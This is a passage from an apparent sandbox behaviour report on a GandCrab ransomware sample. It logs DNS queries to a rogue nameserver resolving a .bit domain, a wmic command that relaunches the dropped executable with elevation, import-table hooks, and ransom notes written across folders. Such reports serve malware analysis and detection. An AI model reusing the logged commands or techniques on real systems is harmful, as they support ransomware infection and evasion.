Receive flags = NO_FLAG_SET, size = 65536, size_out = 44 True 1
Close type = SOCK_DGRAM True 1
UDP Session #2
Information Value
Handle 0x194
Address Family AF_INET
Type SOCK_DGRAM
Protocol IPPROTO_IP
Remote Address 109.234.35.56
Remote Port 53
Local Address -
Local Port -
Data Sent 35 bytes
Data Received 51 bytes
Operation Additional Information Success Count
Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Connect remote_address = 109.234.35.56, remote_port = 53 False 1
Send flags = NO_FLAG_SET, size = 35, size_out = 35 True 1
Receive flags = NO_FLAG_SET, size = 65536, size_out = 51 True 1
Close type = SOCK_DGRAM True 1
UDP Session #3
Information Value
Handle 0x194
Address Family AF_INET
Type SOCK_DGRAM
Protocol IPPROTO_IP
Remote Address 109.234.35.56
Remote Port 53
Local Address -
Local Port -
Data Sent 35 bytes
Data Received 107 bytes
Operation Additional Information Success Count
Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Connect remote_address = 109.234.35.56, remote_port = 53 False 1
Send flags = NO_FLAG_SET, size = 35, size_out = 35 True 1
Receive flags = NO_FLAG_SET, size = 65536, size_out = 107 True 1
Close type = SOCK_DGRAM True 1
Process #13: nslookup.exe
8 17
Information Value
ID #13
File Name c:\windows\syswow64\nslookup.exe
Command Line nslookup politiaromana.bit ns1.virmach.ru
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:02:47, Reason: Child Process
Unmonitor End Time: 00:03:23, Reason: Terminated by Timeout
Monitor Duration 00:00:36
OS Process Information
Information Value
PID 0xee4
Parent PID 0xd40 (c:\users\nd9e1fyi\appdata\roamingqtp35.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username X2VS1CUM\Nd9E1FYi
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0xEE8
0xF04
Region
Host Behavior
Registry (7)
Operation Key Additional Information Success Count
Open Key HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters - True 1
Open Key HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DNSClient - False 1
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters value_name = DNSLookupOrder False 1
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters value_name = Domain True 1
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters value_name = DhcpDomain False 1
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters value_name = SearchList False 1
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters value_name = DhcpSearchList False 1
Module (1)
Operation Module Additional Information Success Count
Get Handle c:\windows\syswow64\nslookup.exe base_address = 0x70000 True 1
Network Behavior
DNS (2)
Operation Additional Information Success Count
Get Hostname name_out = x2vS1cum True 1
Resolve Name host = ns1.virmach.ru, address_out = 109.234.35.56 True 1
UDP Sessions (3)
Information Value
Total Data Sent 114 bytes
Total Data Received 202 bytes
Contacted Host Count 1
Contacted Hosts 109.234.35.56:53
UDP Session #1
Information Value
Handle 0x194
Address Family AF_INET
Type SOCK_DGRAM
Protocol IPPROTO_IP
Remote Address 109.234.35.56
Remote Port 53
Local Address -
Local Port -
Data Sent 44 bytes
Data Received 44 bytes
Operation Additional Information Success Count
Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Connect remote_address = 109.234.35.56, remote_port = 53 False 1
Send flags = NO_FLAG_SET, size = 44, size_out = 44 True 1
Receive flags = NO_FLAG_SET, size = 65536, size_out = 44 True 1
Close type = SOCK_DGRAM True 1
UDP Session #2
Information Value
Handle 0x194
Address Family AF_INET
Type SOCK_DGRAM
Protocol IPPROTO_IP
Remote Address 109.234.35.56
Remote Port 53
Local Address -
Local Port -
Data Sent 35 bytes
Data Received 51 bytes
Operation Additional Information Success Count
Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Connect remote_address = 109.234.35.56, remote_port = 53 False 1
Send flags = NO_FLAG_SET, size = 35, size_out = 35 True 1
Receive flags = NO_FLAG_SET, size = 65536, size_out = 51 True 1
Close type = SOCK_DGRAM True 1
UDP Session #3
Information Value
Handle 0x194
Address Family AF_INET
Type SOCK_DGRAM
Protocol IPPROTO_IP
Remote Address 109.234.35.56
Remote Port 53
Local Address -
Local Port -
Data Sent 35 bytes
Data Received 107 bytes
Operation Additional Information Success Count
Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Connect remote_address = 109.234.35.56, remote_port = 53 False 1
Send flags = NO_FLAG_SET, size = 35, size_out = 35 True 1
Receive flags = NO_FLAG_SET, size = 65536, size_out = 107 True 1
Close type = SOCK_DGRAM True 1
Process #15: wmic.exe
15 0
Information Value
ID #15
File Name c:\windows\syswow64\wbem\wmic.exe
Command Line "C:\Windows\SysWOW64\wbem\wmic.exe" process call create "cmd /c start C:\Users\Nd9E1FYi\AppData\RoamingqTP35.exe"
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:02:53, Reason: Child Process
Unmonitor End Time: 00:03:23, Reason: Terminated by Timeout
Monitor Duration 00:00:30
OS Process Information
Information Value
PID 0x588
Parent PID 0xd40 (c:\users\nd9e1fyi\appdata\roamingqtp35.exe)
Is Created or Modified Executable False
Integrity Level High (Elevated)
Username X2VS1CUM\Nd9E1FYi
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x580
0xC08
0x6A4
0xC40
0xC0C
0xC10
Region
wbemcomn.dll 0x6f3c0000 0x6f426fff Memory Mapped File Readable, Writable, Executable False False False -
wbemprox.dll 0x6f430000 0x6f43cfff Memory Mapped File Readable, Writable, Executable False False False -
framedynos.dll 0x6f440000 0x6f47efff Memory Mapped File Readable, Writable, Executable False False False -
uxtheme.dll 0x6fbf0000 0x6fc64fff Memory Mapped File Readable, Writable, Executable False False False -
wininet.dll 0x6fdc0000 0x6ffccfff Memory Mapped File Readable, Writable, Executable False False False -
urlmon.dll 0x6ffd0000 0x7014dfff Memory Mapped File Readable, Writable, Executable False False False -
iphlpapi.dll 0x715a0000 0x715cefff Memory Mapped File Readable, Writable, Executable False False False -
iertutil.dll 0x71720000 0x719eafff Memory Mapped File Readable, Writable, Executable False False False -
bcrypt.dll 0x73860000 0x7387afff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x73bb0000 0x73bb9fff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x73bc0000 0x73bddfff Memory Mapped File Readable, Writable, Executable False False False -
combase.dll 0x73bf0000 0x73dacfff Memory Mapped File Readable, Writable, Executable False False False -
kernel.appcore.dll 0x73db0000 0x73dbbfff Memory Mapped File Readable, Writable, Executable False False False -
msctf.dll 0x73dc0000 0x73edefff Memory Mapped File Readable, Writable, Executable False False False -
oleaut32.dll 0x73ee0000 0x73f71fff Memory Mapped File Readable, Writable, Executable False False False -
powrprof.dll 0x73f80000 0x73fc3fff Memory Mapped File Readable, Writable, Executable False False False -
ole32.dll 0x73fd0000 0x740bafff Memory Mapped File Readable, Writable, Executable False False False -
ws2_32.dll 0x740c0000 0x7411efff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x74120000 0x741fffff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x74300000 0x743bdfff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x74530000 0x7455afff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x74610000 0x746bcfff Memory Mapped File Readable, Writable, Executable False False False -
windows.storage.dll 0x746c0000 0x74bb8fff Memory Mapped File Readable, Writable, Executable False False False -
shcore.dll 0x74bc0000 0x74c4cfff Memory Mapped File Readable, Writable, Executable False False False -
shlwapi.dll 0x74f10000 0x74f54fff Memory Mapped File Readable, Writable, Executable False False False -
profapi.dll 0x74f60000 0x74f6efff Memory Mapped File Readable, Writable, Executable False False False -
bcryptprimitives.dll 0x74fd0000 0x75027fff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x75090000 0x750d3fff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x764e0000 0x7662efff Memory Mapped File Readable, Writable, Executable False False False -
clbcatq.dll 0x76630000 0x766b3fff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x766c0000 0x7683dfff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x76840000 0x76986fff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x76dc0000 0x76e3afff Memory Mapped File Readable, Writable, Executable False False False -
cfgmgr32.dll 0x76e40000 0x76e76fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x76e90000 0x7700afff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x000000007f590000 0x7f590000 0x7f68ffff Pagefile Backed Memory Readable True False False -
pagefile_0x000000007f690000 0x7f690000 0x7f6b2fff Pagefile Backed Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7df9abbfffff Private Memory Readable True False False -
pagefile_0x00007df9abc00000 0x7df9abc00000 0x7ff9abbfffff Pagefile Backed Memory - True False False -
ntdll.dll 0x7ff9abc00000 0x7ff9abdc0fff Memory Mapped File Readable, Writable, Executable False False False -
private_0x00007ff9abdc1000 0x7ff9abdc1000 0x7ffffffeffff Private Memory Readable True False False -
Host Behavior
COM (5)
Operation Class Interface Additional Information Success Count Logfile
Create WBEMLocator IWbemLocator cls_context = CLSCTX_INPROC_SERVER True 1
Create F6D90F12-9C73-11D3-B32E-00C04F990BB4 2933BF95-7B36-11D2-B20E-00C04F983E60 cls_context = CLSCTX_INPROC_SERVER True 1
Execute WBEMLocator IWbemLocator method_name = ConnectServer, network_resource = root\cli True 1
Execute WBEMLocator IWbemLocator method_name = ConnectServer, network_resource = root\cli\ms_409 True 1
Execute WBEMLocator IWbemLocator method_name = ConnectServer, network_resource = \\X2VS1CUM\ROOT\CIMV2 True 1
Registry (5)
Operation Key Additional Information Success Count Logfile
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM - True 1
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM value_name = Logging, data = 48 True 1
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM value_name = Logging Directory True 1
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM value_name = Logging Directory, data = 37 True 1
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM value_name = Log File Max Size, data = 54 True 1
Module (1)
Operation Module Additional Information Success Count Logfile
Get Handle c:\windows\syswow64\wbem\wmic.exe base_address = 0xc70000 True 1
System (3)
Operation Additional Information Success Count Logfile
Get Computer Name result_out = X2VS1CUM True 1
Get Time type = Local Time, time = 2018-03-14 02:01:08 (Local Time) True 1
Get Info type = System Directory, result_out = C:\Windows\system32 True 1
Process #17: svchost.exe
Information Value
ID #17
File Name c:\windows\system32\svchost.exe
Command Line C:\Windows\system32\svchost.exe -k netsvcs
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:02:55, Reason: RPC Server
Unmonitor End Time: 00:03:23, Reason: Terminated by Timeout
Monitor Duration 00:00:28
Remarks No high level activity detected in monitored regions
OS Process Information
Information Value
PID 0x330
Parent PID 0x1f4 (c:\windows\system32\services.exe)
Is Created or Modified Executable False
Integrity Level System (Elevated)
Username NT AUTHORITY\SYSTEM
Enabled Privileges SeLockMemoryPrivilege, SeTcbPrivilege, SeSystemProfilePrivilege, SeProfileSingleProcessPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege
Thread IDs
Region
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
For performance reasons, the remaining 423 entries are omitted.
The remaining entries can be found in flog.txt.
Process #18: wmiprvse.exe
Information Value
ID #18
File Name c:\windows\system32\wbem\wmiprvse.exe
Command Line C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:02:56, Reason: RPC Server
Unmonitor End Time: 00:03:23, Reason: Terminated by Timeout
Monitor Duration 00:00:27
Remarks No high level activity detected in monitored regions
OS Process Information
Information Value
PID 0xc50
Parent PID 0x248 (c:\windows\system32\svchost.exe)
Is Created or Modified Executable False
Integrity Level System (Elevated)
Username NT AUTHORITY\Network Service
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
Region
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
ntdll.dll 0x7ff9abc00000 0x7ff9abdc0fff Memory Mapped File Readable, Writable, Executable False False False -
Process #19: cmd.exe
Information Value
ID #19
File Name c:\windows\system32\cmd.exe
Command Line cmd /c start C:\Users\Nd9E1FYi\AppData\RoamingqTP35.exe
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:02:57, Reason: Child Process
Unmonitor End Time: 00:03:23, Reason: Terminated by Timeout
Monitor Duration 00:00:26
OS Process Information
Information Value
PID 0x6fc
Parent PID 0xc50 (c:\windows\system32\wbem\wmiprvse.exe)
Is Created or Modified Executable False
Integrity Level High (Elevated)
Username X2VS1CUM\Nd9E1FYi
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs 0x700, 0xCEC
Host Behavior
File (13)
Operation Filename Additional Information Success Count Logfile
Get Info C:\Windows\system32 type = file_attributes True 1
Get Info C:\Windows\System32 type = file_attributes True 1
Open STD_OUTPUT_HANDLE - True 6
Open STD_INPUT_HANDLE - True 4
Open STD_ERROR_HANDLE - True 1
Registry (17)
Operation Key Additional Information Success Count Logfile
Open Key HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System - False 1
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor - True 1
Open Key HKEY_CURRENT_USER\Software\Microsoft\Command Processor - True 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 0, type = REG_NONE False 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = AutoRun, data = 64, type = REG_NONE False 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 64, type = REG_NONE False 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = AutoRun, data = 9, type = REG_NONE False 1
Process (1)
Operation Process Additional Information Success Count Logfile
Create C:\Users\Nd9E1FYi\AppData\RoamingqTP35.exe os_pid = 0xcf0, creation_flags = CREATE_NEW_CONSOLE, CREATE_UNICODE_ENVIRONMENT, CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL True 1
Thread (1)
Operation Process Additional Information Success Count Logfile
Resume c:\windows\system32\cmd.exe os_tid = 0x700 True 1
Module (8)
Operation Module Additional Information Success Count Logfile
Get Handle c:\windows\system32\cmd.exe base_address = 0x7ff7e6a00000 True 1
Get Handle c:\windows\system32\kernel32.dll base_address = 0x7ff9ab6b0000 True 2
Get Filename - process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\system32\cmd.exe, size = 260 True 1
Get Address c:\windows\system32\kernel32.dll function = SetThreadUILanguage, address_out = 0x7ff9ab6d3270 True 1
Get Address c:\windows\system32\kernel32.dll function = CopyFileExW, address_out = 0x7ff9ab6d8940 True 1
Get Address c:\windows\system32\kernel32.dll function = IsDebuggerPresent, address_out = 0x7ff9ab6d7460 True 1
Get Address c:\windows\system32\kernel32.dll function = SetConsoleInputExeNameW, address_out = 0x7ff9a8376e50 True 1
Environment (12)
Operation Additional Information Success Count Logfile
Get Environment String - True 4
Get Environment String name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ True 1
Get Environment String name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC True 2
Get Environment String name = PROMPT False 1
Get Environment String name = COMSPEC, result_out = C:\Windows\system32\cmd.exe True 1
Get Environment String name = KEYS False 1
Set Environment String name = PROMPT, value = $P$G True 1
Set Environment String name = =C:, value = C:\Windows\System32 True 1
Process #21: roamingqtp35.exe
Information Value
ID #21
File Name c:\users\nd9e1fyi\appdata\roamingqtp35.exe
Command Line C:\Users\Nd9E1FYi\AppData\RoamingqTP35.exe
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:02:57, Reason: Child Process
Unmonitor End Time: 00:03:23, Reason: Terminated by Timeout
Monitor Duration 00:00:26
OS Process Information
Information Value
PID 0xcf0
Parent PID 0x6fc (c:\windows\system32\cmd.exe)
Is Created or Modified Executable True
Integrity Level High (Elevated)
Username X2VS1CUM\Nd9E1FYi
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs 0xCF4, 0xCFC, 0xC34, 0xD00, 0xD08, 0xD10, 0xD14, 0xD18, 0xD3C, 0x44C, 0x8B8
Hook Information
Type Installer Target Size Information Actions
IAT private_0x00000000004c0000:+0x696e4 11. entry of roamingqtp35.exe 4 bytes kernel32.dll:GetCommTimeouts+0x0 now points to private_0x000000007fff0000:+0x51fd5215
IAT private_0x00000000004c0000:+0x696e4 15. entry of roamingqtp35.exe 4 bytes kernel32.dll:CompareStringA+0x0 now points to private_0x000000007fff0000:+0x52ddfb55
IAT private_0x00000000004c0000:+0x696e4 20. entry of roamingqtp35.exe 4 bytes kernel32.dll:WriteConsoleW+0x0 now points to private_0x000000007fff0000:+0x7b046002
IAT private_0x00000000004c0000:+0x696e4 21. entry of roamingqtp35.exe 4 bytes kernel32.dll:GetConsoleOutputCP+0x0 now points to private_0x000000007fff0000:+0x7516097b
IAT private_0x00000000004c0000:+0x696e4 22. entry of roamingqtp35.exe 4 bytes kernel32.dll:WriteConsoleA+0x0 now points to private_0x000000007fff0000:+0x2046cd6
IAT private_0x00000000004c0000:+0x696e4 27. entry of roamingqtp35.exe 4 bytes kernel32.dll:SetHandleCount+0x0 now points to private_0x000000007fff0000:+0x25161fce
IAT private_0x00000000004c0000:+0x696e4 30. entry of roamingqtp35.exe 4 bytes kernel32.dll:GetStartupInfoA+0x0 now points to private_0x000000007fff0000:+0x7cd8fa5c
IAT private_0x00000000004c0000:+0x696e4 31. entry of roamingqtp35.exe 4 bytes ntdll.dll:RtlDeleteCriticalSection+0x0 now points to private_0x000000007fff0000:+0x9242e76
IAT private_0x00000000004c0000:+0x696e4 32. entry of roamingqtp35.exe 4 bytes kernel32.dll:TerminateProcess+0x0 now points to private_0x000000007fff0000:+0x5dcf6b3b
IAT private_0x00000000004c0000:+0x696e4 33. entry of roamingqtp35.exe 4 bytes kernel32.dll:GetCurrentProcess+0x0 now points to private_0x000000007fff0000:+0x7d6a5255
IAT private_0x00000000004c0000:+0x696e4 35. entry of roamingqtp35.exe 4 bytes kernel32.dll:SetUnhandledExceptionFilter+0x0 now points to private_0x000000007fff0000:+0x6c633147
IAT private_0x00000000004c0000:+0x696e4 36. entry of roamingqtp35.exe 4 bytes kernel32.dll:IsDebuggerPresent+0x0 now points to private_0x000000007fff0000:+0x750303f9
IAT private_0x00000000004c0000:+0x696e4 39. entry of roamingqtp35.exe 4 bytes kernel32.dll:ExitProcess+0x0 now points to private_0x000000007fff0000:+0x7f836a17
IAT private_0x00000000004c0000:+0x696e4 40. entry of roamingqtp35.exe 4 bytes kernel32.dll:WriteFile+0x0 now points to private_0x000000007fff0000:+0x4e7c1f04
IAT private_0x00000000004c0000:+0x696e4 42. entry of roamingqtp35.exe 4 bytes kernel32.dll:GetModuleFileNameW+0x0 now points to private_0x000000007fff0000:+0x57fd5c12
IAT private_0x00000000004c0000:+0x696e4 44. entry of roamingqtp35.exe 4 bytes kernel32.dll:GetEnvironmentStringsW+0x0 now points to private_0x000000007fff0000:+0x7d463088
IAT private_0x00000000004c0000:+0x696e4 49. entry of roamingqtp35.exe 4 bytes kernel32.dll:TlsFree+0x0 now points to private_0x000000007fff0000:+0x24ba1fce
IAT private_0x00000000004c0000:+0x696e4 50. entry of roamingqtp35.exe 4 bytes kernel32.dll:InterlockedIncrement+0x0 now points to private_0x000000007fff0000:+0x433a1203
IAT private_0x00000000004c0000:+0x696e4 73. entry of roamingqtp35.exe 4 bytes kernel32.dll:LoadLibraryA+0x0 now points to private_0x000000007fff0000:+0x3a3e0fa5
IAT private_0x00000000004c0000:+0x696e4 76. entry of roamingqtp35.exe 4 bytes ntdll.dll:RtlReAllocateHeap+0x0 now points to private_0x000000007fff0000:+0x936cdce
IAT private_0x00000000004c0000:+0x696e4 83. entry of roamingqtp35.exe 4 bytes kernel32.dll:GetStringTypeA+0x0 now points to private_0x000000007fff0000:+0xedafd55
IAT private_0x00000000004c0000:+0x696e4 86. entry of roamingqtp35.exe 4 bytes kernel32.dll:GetDateFormatA+0x0 now points to private_0x000000007fff0000:+0x44872e26
IAT private_0x00000000004c0000:+0x696e4 90. entry of roamingqtp35.exe 4 bytes kernel32.dll:IsValidLocale+0x0 now points to private_0x000000007fff0000:+0xe5dea1e
IAT private_0x00000000004c0000:+0x696e4 92. entry of roamingqtp35.exe 4 bytes ntdll.dll:RtlSizeHeap+0x0 now points to private_0x000000007fff0000:+0x26dafb13
IAT private_0x00000000004c0000:+0x696e4 96. entry of roamingqtp35.exe 4 bytes user32.dll:GetProcessWindowStation+0x0 now points to private_0x000000007fff0000:+0x3056d04
Host Behavior
File (2162)
Operation Filename Additional Information Success Count Logfile
Create C:\Users\Nd9E1FYi\AppData\RoamingqTP35.exe desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ True 1
Create C:\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\$Recycle.Bin\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\$Recycle.Bin\S-1-5-18\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\$Recycle.Bin\S-1-5-21-2172869166-1497266965-2109836178-1000\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Documents and Settings\Default\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Documents and Settings\Default\AppData\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Documents and Settings\Default\AppData\Local\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Documents and Settings\Default\AppData\Local\Application Data\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\History\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temporary Internet Files\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\History\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
